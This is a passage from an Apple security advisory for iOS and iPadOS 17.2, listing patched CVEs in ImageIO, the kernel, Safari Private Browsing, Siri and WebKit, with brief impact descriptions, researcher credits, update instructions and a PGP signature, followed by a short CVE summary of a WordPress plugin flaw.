information.CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)ImageIOAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing an image may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.CVE-2023-42898: Junsung LeeCVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung LeeKernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to break out of its sandboxDescription: The issue was addressed with improved memory handling.CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv(@Synacktiv)Safari Private BrowsingAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Private Browsing tabs may be accessed without authenticationDescription: This issue was addressed through improved state management.CVE-2023-42923: ARJUN S DSiriAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker with physical access may be able to use Siri toaccess sensitive user dataDescription: The issue was addressed with improved checks.CVE-2023-42897: Andrew Goldberg of The McCombs School of Business, TheUniversity of Texas at Austin (linkedin.com/andrew-goldberg-/)WebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 259830CVE-2023-42890: Pwn2carWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing an image may lead to a denial-of-serviceDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 263349CVE-2023-42883: Zoom Offensive Security TeamAdditional recognitionSafari Private BrowsingWe would like to acknowledge Joshua Lund of Signal Technology Foundationfor their assistance.Setup AssistantWe would like to acknowledge Aaron Gregory of Acoustic.com and EasternIllinois University – Graduate School of Technology for theirassistance.WebKitWe would like to acknowledge 椰椰 for their assistance.Wi-FiWe would like to acknowledge Noah Roskin-Frazee and Prof. J.(ZeroClicks.ai Lab) for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.2 and iPadOS 17.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmV3qS0ACgkQX+5d1TXaIvpuvRAAsTLfKiqLQl5qptq6yCPw8oPdttsnGkfZG//ISfcC46tZQI0BGjdFTEww2QUYOde00FMqk99ubD0/lE7gs/BdVP+1cSiG90FfZsHt/q0Jm+eIbhIsQdCs8eLcBOVAdPRLCJ1kdD13zbpnHH+IoZUPVTlY4gVo5ps1DP1iOHBWMN2ks3RNW7+NQ3ygCxyCs9qLce+zC7p69rCbCSvqmdEfC7OZ2tEFwELJcWgDDzVpa9nxBMSXp67qvFamSHsdZu+mBOyDpgRaQ77s/LL6Aj/EUzGoqu9j0K+fYht/prPtswa7mBvqi3qXyJUUW1TqQzquo3jRoestFuyuLol9PsufcJB2HbsswT/9qaYx9fO6g6M3uj3fu9NkojPtO45gxHkaIcO/h0ixpGrjg8ZlfKTkGN7DoQ97pv+DxUrhIFskUKRZLF5Xb6B5mztLBu5UePYRPVHi9qe48qN8/g7X8z9VvzmR++ns45ODRns7/PH8DHlJXa8+xoJkn+9nL2Q9x7zkcD/YNbgMstROhtbqczk1tSbqF+J9tnKC+PzW+vhBwDMat8h+jC7QKPh0d9oTBNiqhECRlb+6OewTf5f1UBbrgjGOvk/xgz+RS96aAOUNkcoJ6WDXcSlga3ERMO1jBqle3G3LlSvTqtwJ53PHnzBMogk1m5Bo0OSOJYjIOczKm3g==71FW-----END PGP SIGNATURE-----

Apple Security Advisory 12-11-2023-2

CVE-2021-1952

The LabTools WordPress plugin through 1.0 does not have proper authorisation and CSRF check in place when deleting publications, allowing any authenticated users, such as subscriber to delete arbitrary publication

Search

lenovo warranty check/lookup | check warranty status | lenovo support us